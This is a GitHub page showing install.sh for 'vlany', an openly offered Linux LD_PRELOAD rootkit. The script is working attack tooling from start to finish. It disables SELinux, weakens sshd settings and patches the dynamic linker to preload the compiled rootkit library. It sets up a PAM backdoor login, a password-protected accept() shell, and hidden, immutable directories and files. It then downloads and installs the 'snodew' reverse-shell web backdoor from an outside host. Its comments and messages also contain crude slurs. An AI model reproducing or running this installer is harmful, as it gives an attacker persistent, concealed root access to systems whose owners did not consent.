-
Notifications
You must be signed in to change notification settings - Fork 194
/
Copy pathinstall.sh
executable file
·456 lines (374 loc) · 21.4 KB
/
install.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
#!/bin/bash
# errors and fatal risks
[ $(uname) != "Linux" ] && { echo "Not on a Linux system. Exiting."; exit; } # i plan on adding support for OS X once everything else it dealt with
[ $(id -u) != 0 ] && { echo "Not root. Exiting."; exit; }
if [ -f /etc/selinux/config ]; then
echo "SELinux config found on system. Checking SELinux status."
if [[ $(cat /etc/selinux/config | grep "SELINUX=" | tail -n 1) == *"enforcing"* ]]; then
echo "SELinux is currently enforcing."
read -p "To disable SELinux, press enter to continue or ^C to exit. (Requires reboot)"
sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || { echo "SELinux could not be disabled. Exiting."; exit; }
echo "SELinux disabled."
echo "To continue with installation, reboot the box and restart the installation process."
exit
else
echo "SELinux config is clean."
fi
# actually verify if the box has been rebooted or not, can by bypassed with setenforce 0 but i'm gay
if [[ $(sestatus -v | head -n 1) == *"enabled"* ]]; then
echo "SELinux is still enabled. Reboot."
exit
else
echo "SELinux is disabled."
fi
fi
# temporary fix for the reboot brick, going to add a mechanism to vlany to hide changes to the grub.conf file later.
# there's also some stuff i can do with init to kinda hide these changes a BIT more...
echo "Attempting to prevent reboot brick"
read -p "Enter location of bootloader config file (if grub2, config file is /boot/grub/grub.cfg) [/etc/grub.conf]: "
[ -z $REPLY ] && GRUB_CONF="/etc/grub.conf"
[ ! -z $REPLY ] && GRUB_CONF="$REPLY"
[ ! -f "$GRUB_CONF" ] && echo "File $GRUB_CONF doesn't exist. You might have to manually find and edit the config file. (read this part of install.sh)"
[ -f "$GRUB_CONF" ] && sed -i -- "s/\bro\b/rw/g" $GRUB_CONF # ok thats better, change read-only to read/write. ruins some recovery stuff, but an ok fix for now...
[[ "$GRUB_CONF" == *"/etc/grub.d/"* ]] && { echo "Updating grub"; update-grub; }
echo "Done."
[ ! -e /proc ] && { echo "We're in a terrible jail. /proc doesn't exist. Exiting."; exit; }
if [ -z "`which gcc`" ]; then
echo "Installing gcc"
if [ -f /usr/bin/yum ]; then
yum install -y -q -e 0 gcc &>/dev/null
elif [ -f /usr/bin/apt-get ]; then
yes | apt-get update &>/dev/null
apt-get --yes --force-yes install gcc &>/dev/null
elif [ -f /usr/bin/pacman ]; then
pacman -Syy &>/dev/null
pacman -S --noconfirm base-devel &>/dev/null
fi
fi
[ -f /usr/bin/yum ] && { echo "Installing glibc-static"; yum install -y -q -e 0 glibc-static; }
gcc misc/rm_preload.c -static -o misc/rm_preload || { echo "Couldn't statically compile misc/rm_preload.c ... Exiting."; exit; }
echo "Checking for current presence of (and removing, if necessary) ld.so.preload"
misc/rm_preload && rm misc/rm_preload
read -p "Press enter to continue, or ^C to exit."
# conditional warnings, credits to a certain individual
gcc misc/detect_lxc.c -o misc/detect_lxc
[[ $(misc/detect_lxc && rm misc/detect_lxc) == *"definitely in LXC"* ]] && { read -p "Warning: In an LXC container. Press enter to continue or ^C to exit."; }
[[ $(misc/detect_openvz.sh) == *"in OpenVZ"* ]] && { read -p "Warning: In an OpenVZ container. Press enter to continue or ^C to exit."; }
[ ! -z "`which sash`" ] && { read -p "Warning: sash is installed on this box. Press enter to continue or ^C to exit."; }
[ -d /proc/vz ] && { read -p "Warning: You're attempting to install vlany in an OpenVZ environment. Press enter to continue or ^C to exit."; }
[ -f /usr/bin/lveps ] && { read -p "Warning: You're attempting to install vlany in a CloudLinux LVE. Press enter to continue or ^C to exit."; }
[[ $(cat /proc/scsi/scsi 2>/dev/null | grep "VBOX") == *"VBOX"* ]] && { read -p "Warning: You're attempting to install vlany on a VirtualBox VM. Press enter to continue or ^C to exit."; } # afaik this only works on ubuntu
# nothing fatal but still good to know
[ -d /proc/xen ] && { echo "Information: You're installing vlany on a Xen environment."; }
[ ! -f /etc/ssh/sshd_config ] && { echo "/etc/ssh/sshd_config not found. ssh might not be installed. Install it."; exit; }
[ ! "$(cat /etc/ssh/sshd_config | grep 'UsePAM')" == "UsePAM yes" ] && { echo "UsePAM yes" >> /etc/ssh/sshd_config; }
[ ! "$(cat /etc/ssh/sshd_config | grep 'PasswordAuthentication yes')" == "PasswordAuthentication yes" ] && { sed -i -e 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config; }
CHATTR_OUTPUT=$(touch children; chattr +ia children &>output; cat output)
[[ $CHATTR_OUTPUT == *"Inappropriate ioctl"* ]] && { read -p "Warning: You're attempting to install vlany on a weird/alien filesystem. This is bad. Bailing."; exit; }
chattr -ia children &>/dev/null; rm -f children output
patch_dynamic_linker ()
{
misc/patch_ld.py &>/dev/null
NEW_PRELOAD=$(cat new_preload)
rm new_preload
}
install_snodew ()
{
MAGIC_GID=$(cat magic_gid) && rm magic_gid
wget https://github.com/mempodippy/snodew/archive/master.tar.gz && tar xvpfz master.tar.gz
rm master.tar.gz || { echo "Error: master.tar.gz doesn't exist. Exiting."; exit; }
if [ "$INSTALLING_IN_CLI" == "1" ]; then
read -p "Snodew installation directory [/var/www/html]: "
[ -z $REPLY ] && SNODEW_INSTALL="/var/www/html";
[ ! -z $REPLY ] && SNODEW_INSTALL="$REPLY";
[ ! -d "$SNODEW_INSTALL" ] && { echo "Error: Directory doesn't exist, skipping snodew installation."; return; }
read -p "Snodew password: "
[ -z $REPLY ] && { echo "Error: Password can't be empty, skipping snodew installation."; return; }
[ ! -z $REPLY ] && SNODEW_PASSWORD="$REPLY";
else
SNODEW_INSTALL="/var/www/html"
SNODEW_INSTALL=$(dialog --title "$TITLE" --inputbox "\nSnodew installation directory" 9 50 "$SNODEW_INSTALL" 3>&1 1>&2 2>&3)
[ ! -d "$SNODEW_INSTALL" ] && { dialog --title "$TITLE" --infobox "Directory doesn't exist, skipping snodew installation." 3 50 3>&1 1>&2 2>&3; return; }
SNODEW_PASSWORD=$(dialog --title "$TITLE" --passwordbox "\nSnodew password" 9 50 3>&1 1>&2 2>&3)
[ -z $SNODEW_PASSWORD ] && { dialog --title "$TITLE" --infobox "Password can't be empty, skipping snodew installation." 3 50 3>&1 1>&2 2>&3; return; }
fi
cd snodew-master/
./setup.sh $SNODEW_INSTALL $SNODEW_PASSWORD $HIDDEN_XATTR_1_STR $MAGIC_GID || { echo "Error: Couldn't run setup script, skipping snodew installation."; return; }
}
install_vlany_prerequisites ()
{
if [ -f /usr/bin/yum ]; then
yum install -y -q -e 0 make gcc pam-devel openssl-devel newt libgcc.i686 glibc-devel.i686 glibc-devel openssl-devel.i686 libpcap libpcap-devel vim-common attr &>/dev/null
elif [ -f /usr/bin/apt-get ]; then
dpkg --add-architecture i386 &>/dev/null
yes | apt-get update &>/dev/null
apt-get --yes --force-yes install attr libpam0g-dev libpcap-dev libssl-dev gcc-multilib build-essential &>/dev/null
if ! grep -q "Debian GNU/Linux 7\|Ubuntu 12.04\|Ubuntu 14.04" /etc/issue.net; then
apt-get --yes --force-yes install libssl-dev:i386 &>/dev/null
fi
[ ! -z "$(apt-cache search libpcap0.8-dev)" ] && { apt-get --yes --force-yes install libpcap0.8-dev &>/dev/null; }
grep -i ubuntu /proc/version &>/dev/null && rm -f /etc/init/plymouth* &>/dev/null
elif [ -f /usr/bin/pacman ]; then
pacman -Syy &>/dev/null
pacman -S --noconfirm attr pam openssl libpcap base-devel &>/dev/null
fi
if [ -f /usr/bin/yum ]; then
yum install -y -q -e 0 python2
elif [ -f /usr/bin/apt-get ]; then
yes | apt-get update &>/dev/null && sleep 1
apt-get --yes --force-yes install python &>/dev/null
elif [ -f /usr/bin/pacman ]; then
pacman -Syy &>/dev/null
pacman -S --noconfirm python2 &>/dev/null
fi
[ -z "`which python2`" ] && { echo "python2 was not found. Exiting."; exit; }
}
vlany_install_dialog ()
{
echo "Installing dialog"
if [ -f /usr/bin/yum ]; then
yum install -y -q -e 0 dialog
elif [ -f /usr/bin/apt-get ]; then
yes | apt-get update &>/dev/null
apt-get --yes --force-yes install dialog &>/dev/null
elif [ -f /usr/bin/pacman ]; then
pacman -Syy &>/dev/null
pacman -S --noconfirm dialog &>/dev/null
fi
[ -z "`which dialog`" ] && { echo "dialog was not found. Either install dialog and run this script again, or run this script with the --cli flag."; exit; }
}
get_vlany_settings ()
{
if [ "$INSTALLING_IN_CLI" == "1" ]; then
read -p "PAM backdoor username: "
[ -z $REPLY ] && { echo "LOLOL JUST KIDDING RETARD"; exit; }
V_USER=$REPLY
read -p "PAM backdoor password: "
[ -z $REPLY ] && { echo "LOLOL JUST KIDDING RETARD"; exit; }
V_PASS=$REPLY
PAM_PORT="$(cat /dev/urandom | tr -dc '1-9' | fold -w 4 | head -n 1)"
read -p "Hidden PAM port [$PAM_PORT]: "
[ ! -z $REPLY ] && PAM_PORT=$REPLY;
read -p "Optional SSL encryption for accept() hook backdoor (Yes/No) [No]: "
if [ -z $REPLY ]; then
SSL_STATUS=0
elif [ "$REPLY" == "Yes" ]; then
SSL_STATUS=1
elif [ "$REPLY" == "No" ]; then
SSL_STATUS=0
else
echo "Invalid response for SSL encryption option. Exiting."
exit
fi
read -p "accept() shell password: "
[ -z $REPLY ] && { echo "LOLOL JUST KIDDING RETARD"; exit; }
ACCEPT_SHELL_PASSWORD=$REPLY
LOW_PORT="$(cat /dev/urandom | tr -dc '1-9' | fold -w 3 | head -n 1)"
read -p "accept() low port [$LOW_PORT]: "
[ ! -z $REPLY ] && LOW_PORT=$REPLY;
HIGH_PORT="$(($LOW_PORT + $(cat /dev/urandom | tr -dc '2-5' | fold -w 1 | head -n 1)))"
read -p "accept() high port [$HIGH_PORT]: "
[ ! -z $REPLY ] && HIGH_PORT=$REPLY;
read -p "execve command password: "
[ -z $REPLY ] && { echo "LOLOL JUST KIDDING RETARD"; exit; }
EXECVE_PASS=$REPLY
OBJECT_FILE_NAME="$(cat /dev/urandom | tr -dc 'A-Za-z0-9' | fold -w 12 | head -n 1)"
read -p "Rootkit library name [$OBJECT_FILE_NAME]: "
[ ! -z $REPLY ] && OBJECT_FILE_NAME=$REPLY;
INSTALL="/lib/libc.so.$V_USER.$(cat /dev/urandom | tr -dc '0-9' | fold -w 2 | head -n 1)"
read -p "Hidden directory [$INSTALL]: "
[ ! -z $REPLY ] && INSTALL=$REPLY;
ENV_VAR="$(cat /dev/urandom | tr -dc 'A-Z' | fold -w 12 | head -n 1)"
read -p "Environment variable [$ENV_VAR]: "
[ ! -z $REPLY ] && ENV_VAR=$REPLY;
else
# i could add checks to see if input is empty but lazy
V_USER=$(dialog --title "$TITLE" --inputbox "\nPAM backdoor username" 9 50 3>&1 1>&2 2>&3)
V_PASS=$(dialog --title "$TITLE" --passwordbox "\nPAM backdoor password" 9 50 3>&1 1>&2 2>&3)
PAM_PORT="$(cat /dev/urandom | tr -dc '1-9' | fold -w 4 | head -n 1)"
PAM_PORT=$(dialog --title "$TITLE" --inputbox "\nHidden PAM port" 9 50 "$PAM_PORT" 3>&1 1>&2 2>&3)
SSL_STATUS=$(dialog --title "$TITLE" --menu "Optional SSL encryption for accept() hook backdoor" 10 82 5 "No" "Disables SSL encryption in the accept backdoor" "Yes" "Enables SSL encryption, but requires an SSL enabled backdoor listener" 3>&1 1>&2 2>&3)
[ "$SSL_STATUS" == "No" ] && SSL_STATUS=0;
[ "$SSL_STATUS" == "Yes" ] && SSL_STATUS=1;
ACCEPT_SHELL_PASSWORD=$(dialog --title "$TITLE" --passwordbox "\naccept() shell password" 9 50 3>&1 1>&2 2>&3)
LOW_PORT="$(cat /dev/urandom | tr -dc '1-9' | fold -w 3 | head -n 1)"
LOW_PORT=$(dialog --title "$TITLE" --inputbox "\naccept() low port" 9 50 "$LOW_PORT" 3>&1 1>&2 2>&3)
HIGH_PORT="$(($LOW_PORT + $(cat /dev/urandom | tr -dc '2-5' | fold -w 1 | head -n 1)))"
HIGH_PORT=$(dialog --title "$TITLE" --inputbox "\naccept() high port" 9 50 "$HIGH_PORT" 3>&1 1>&2 2>&3)
EXECVE_PASS=$(dialog --title "$TITLE" --passwordbox "\nexecve command password" 9 50 3>&1 1>&2 2>&3)
OBJECT_FILE_NAME="$(cat /dev/urandom | tr -dc 'A-Za-z0-9' | fold -w 12 | head -n 1)"
OBJECT_FILE_NAME=$(dialog --title "$TITLE" --inputbox "\nRootkit library name" 9 50 "$OBJECT_FILE_NAME" 3>&1 1>&2 2>&3)
INSTALL="/lib/libc.so.$V_USER.$(cat /dev/urandom | tr -dc '0-9' | fold -w 2 | head -n 1)"
INSTALL=$(dialog --title "$TITLE" --inputbox "\nHidden directory" 9 50 "$INSTALL" 3>&1 1>&2 2>&3)
ENV_VAR="$(cat /dev/urandom | tr -dc 'A-Z' | fold -w 12 | head -n 1)"
ENV_VAR=$(dialog --title "$TITLE" --inputbox "\nEnvironment variable" 9 50 "$ENV_VAR" 3>&1 1>&2 2>&3)
fi
HIDDEN_XATTR_1_STR="$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 32 | head -n 1)"
HIDDEN_XATTR_2_STR="$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 32 | head -n 1)"
LIB_LOCATION="${INSTALL}/${OBJECT_FILE_NAME}.so.\$PLATFORM"
}
config_vlany ()
{
# the argument passing to config.py looks fucking ugly im so sorry
if [[ ! $(python2 config.py $INSTALL $LIB_LOCATION $HIDDEN_XATTR_1_STR $HIDDEN_XATTR_2_STR $V_USER $V_PASS $PAM_PORT $SSL_STATUS $ACCEPT_SHELL_PASSWORD $LOW_PORT $HIGH_PORT $EXECVE_PASS $ENV_VAR 0 $NEW_PRELOAD) == *"success"* ]]; then
if [ "$INSTALLING_IN_CLI" != "1" ]; then
dialog --title "$TITLE" --infobox "Configuration failed. Exiting." 3 50 3>&1 1>&2 2>&3
else
echo "Configuration failed. Exiting."
fi
sleep 3; clear; exit
fi
}
compile_vlany ()
{
WARNING_FLAGS="-Wall -Wno-comment -Wno-unused-result"
OPTIMIZATION_FLAGS="-O0 -g0"
OPTIONS="-fomit-frame-pointer -fPIC"
LINKER_OPTIONS="-Wl,--build-id=none"
# no point in linking libssl if SSL isn't being used for the accept backdoor lol
[ $SSL_STATUS == 1 ] && LINKER_FLAGS="-ldl -lssl -lcrypt"
[ $SSL_STATUS == 0 ] && LINKER_FLAGS="-ldl -lcrypt"
rm -rf *.so.* # remove any already compiled libs
gcc -std=gnu99 $OPTIMIZATION_FLAGS vlany.c $WARNING_FLAGS $OPTIONS -shared $LINKER_FLAGS $LINKER_OPTIONS -o ${OBJECT_FILE_NAME}.so.x86_64
gcc -m32 -std=gnu99 $OPTIMIZATION_FLAGS vlany.c $WARNING_FLAGS $OPTIONS -shared $LINKER_FLAGS $LINKER_OPTIONS -o ${OBJECT_FILE_NAME}.so.i686 &>/dev/null
strip ${OBJECT_FILE_NAME}.so.x86_64 || { echo "Couldn't strip library. Compilation failed, exiting."; exit; }
strip ${OBJECT_FILE_NAME}.so.i686 &>/dev/null
}
install_vlany ()
{
rm -rf $INSTALL/
mkdir -p $INSTALL/
[ "`uname -m`" == "armv6l" ] && cp ${OBJECT_FILE_NAME}.so.x86_64 $INSTALL/${OBJECT_FILE_NAME}.v6l
[ "`uname -m`" != "armv6l" ] && cp ${OBJECT_FILE_NAME}.so.* $INSTALL/
[ -f "$NEW_PRELOAD" ] && chattr -ia $NEW_PRELOAD &>/dev/null
echo -n $LIB_LOCATION > $NEW_PRELOAD
}
setup_vlany ()
{
export ${ENV_VAR}=1 # temporary rk user permission so we can get stuff ready
rm -rf *.so.* *.o
echo "Date/time of vlany installation: $(date "+%a, %d %b %Y - %T")" >> $INSTALL/.vlany_information
echo "PAM backdoor username: $V_USER" >> $INSTALL/.vlany_information
echo "Hidden PAM port: $PAM_PORT" >> $INSTALL/.vlany_information
echo "accept backdoor low port: $LOW_PORT" >> $INSTALL/.vlany_information
echo "accept backdoor high port: $HIGH_PORT" >> $INSTALL/.vlany_information
echo "Hidden directory: $INSTALL" >> $INSTALL/.vlany_information
echo "Environment variable: $ENV_VAR" >> $INSTALL/.vlany_information
# set up hidden directory
echo '. .bashrc' > $INSTALL/.profile
mv bashrc $INSTALL/.bashrc
mv shell_msg $INSTALL/.shell_msg
mv bd_readme $INSTALL/README
cp misc/enter_lxc.c $INSTALL/enter_lxc.c
cp misc/ssh.sh $INSTALL/ssh.sh
# new scripts for unhiding purposes
mv misc/scripts/ $INSTALL/
# protect files and directories
setfattr -n user.${HIDDEN_XATTR_1_STR} -v ${HIDDEN_XATTR_2_STR} $NEW_PRELOAD
setfattr -n user.${HIDDEN_XATTR_1_STR} -v ${HIDDEN_XATTR_2_STR} $INSTALL $INSTALL/* $INSTALL/.profile $INSTALL/.bashrc $INSTALL/.shell_msg $INSTALL/.vlany_information
chattr +ia $INSTALL/.profile $INSTALL/.bashrc $INSTALL/.shell_msg $INSTALL/.vlany_information $INSTALL/${OBJECT_FILE_NAME}*
}
# gay fuck
export TERM=xterm
if [ "$1" == "--cli" ]; then
echo "Installing vlany without a tui."
read -p "Do you want to compile or install vlany? (enter 'compile' or 'install'): "
[ -z $REPLY ] && { echo "Invalid option. Exiting."; exit; }
if [ "$REPLY" == "install" ]; then
echo "Regularly installing vlany."
STATUS="install"
elif [ "$REPLY" == "compile" ]; then
echo "Compiling vlany."
STATUS="compile"
else
echo "Invalid option. Exiting."
exit
fi
echo "Installing prerequisite packages... Please wait."
install_vlany_prerequisites
echo "Packages installed."
[ $STATUS != "compile" ] && { echo "Patching dynamic linker."; patch_dynamic_linker; echo "Dynamic linker patched."; }
[ $STATUS == "compile" ] && { NEW_PRELOAD="imgay"; }
printf "\033[1;31mBeginning configuration. Please don't leave any options that don't have default values empty (options with default values have [VALUE] in them). I can't be bothered checking for empty input.\033[0m\n"
INSTALLING_IN_CLI=1
get_vlany_settings
config_vlany
echo "Compiling rootkit libraries."
sleep 2
compile_vlany
echo "Rootkit libraries compiled."
sleep 2
[ $STATUS == "compile" ] && { rm -rf *.o magic_gid bashrc shell_msg bd_readme; exit; }
echo "Installing vlany."
sleep 1
install_vlany
echo "Installed."
sleep 1
echo "Setting up hidden directory and protecting files."
sleep 1
setup_vlany
echo "The installation process has finished. You can now SSH into your PAM backdoor user, or you can use nc (or something better) to connect to your accept() hook backdoor."
read -p "Would you like to automatically remove this directory (`pwd`) on exit? (YES/NO) (case-sensitive) [NO]: "
if [ -z $REPLY ]; then
echo "Not removing `pwd`"
elif [ "$REPLY" == "YES" ]; then
rm -rf `pwd`
elif [ "$REPLY" == "NO" ]; then
echo "Not removing `pwd`"
else
echo "Invalid option. Not removing."
fi
else
vlany_install_dialog
TITLE="VLANY INSTALLATION"
dialog --title "$TITLE" --msgbox "Welcome to the vlany installation script. Follow the prompts shown to install or compile vlany. Some options will already have default values, you can change them if you want to, but there's no need. When prompted for input, please don't leave it empty. I can't be bothered checking for empty input. Finally, remember that you can't see the password as you type it. You will be given more information after connecting to the ssh backdoor (use ssh.sh in directory misc/ to connect by use of the hidden PAM port). Hit enter to begin installation." 15 60
dialog --title "$TITLE" --yesno "Do you want to install vlany?\n(Selecting 'No' will only compile it.)" 6 50 3>&1 1>&2 2>&3
RESPONSE=$?
[ $RESPONSE == 1 ] && { dialog --title "$TITLE" --msgbox "You're choosing to compile vlany. It will not be installed." 6 50; }
dialog --title "$TITLE" --infobox "Installing prerequisite packages...\nPlease wait." 4 50 3>&1 1>&2 2>&3
install_vlany_prerequisites
dialog --title "$TITLE" --msgbox "Packages installed." 5 50
[ $RESPONSE != 1 ] && { dialog --title "$TITLE" --infobox "Patching dynamic linker." 3 50 3>&1 1>&2 2>&3; patch_dynamic_linker; dialog --title "$TITLE" --msgbox "Dynamic linker patched." 5 50; }
[ $RESPONSE == 1 ] && { NEW_PRELOAD="imgay"; }
get_vlany_settings
config_vlany
dialog --title "$TITLE" --infobox "Compiling rootkit libraries." 3 50 3>&1 1>&2 2>&3
sleep 2
compile_vlany
dialog --title "$TITLE" --infobox "Rootkit libraries compiled." 3 50 3>&1 1>&2 2>&3
sleep 2
if [ $RESPONSE == 1 ]; then
rm -rf *.o bashrc shell_msg bd_readme
clear
exit
fi
dialog --title "$TITLE" --infobox "Installing vlany." 7 25 3>&1 1>&2 2>&3
sleep 1
install_vlany
dialog --title "$TITLE" --infobox "Installed." 7 20 3>&1 1>&2 2>&3
sleep 1
dialog --title "$TITLE" --infobox "Setting up hidden directory and protecting files." 7 40 3>&1 1>&2 2>&3
sleep 1
setup_vlany
AUTO_RM=$(dialog --title "$TITLE" --menu "The installation process has finished. You can now SSH into your PAM backdoor user, or you can use nc (or something better) to connect to your accept() hook backdoor.\n\nDo you want to automatically remove this directory? (`pwd`)" 20 30 20 "No" "" "Yes" "" 3>&1 1>&2 2>&3)
[ "$AUTO_RM" == "Yes" ] && { rm -rf `pwd`; }
fi
# processes won't be infected with vlany until they are restarted and load our library
echo "Attempting to restart the ssh and apache2/nginx services. You may have to do this manually after installation."
[ -f "/etc/init.d/ssh" ] && { echo "Restarting sshd"; /etc/init.d/ssh restart &>/dev/null; }
[ -f "/etc/init.d/apache2" ] && { echo "Restarting apache2"; /etc/init.d/apache2 restart &>/dev/null; }
[ -f "/etc/init.d/nginx" ] && { echo "Restarting nginx"; /etc/init.d/nginx restart &>/dev/null; }
read -p "Installation has finished. Would you like to setup the experimental snodew root reverse shell backdoor? (YES/NO) (case-sensitive) [YES]: "
if [ -z $REPLY ]; then
install_snodew
elif [ "$REPLY" == "YES" ]; then
install_snodew
elif [ "$REPLY" == "NO" ]; then
echo "Not installing snodew."
else
echo "Invalid option. Assuming yes."
install_snodew
fi
clear; cat $INSTALL/.vlany_information; echo "Installation finished."
[ "$REPLY" == "YES" ] && echo "Look in the directory you specified for the filename of the snodew backdoor.";
exit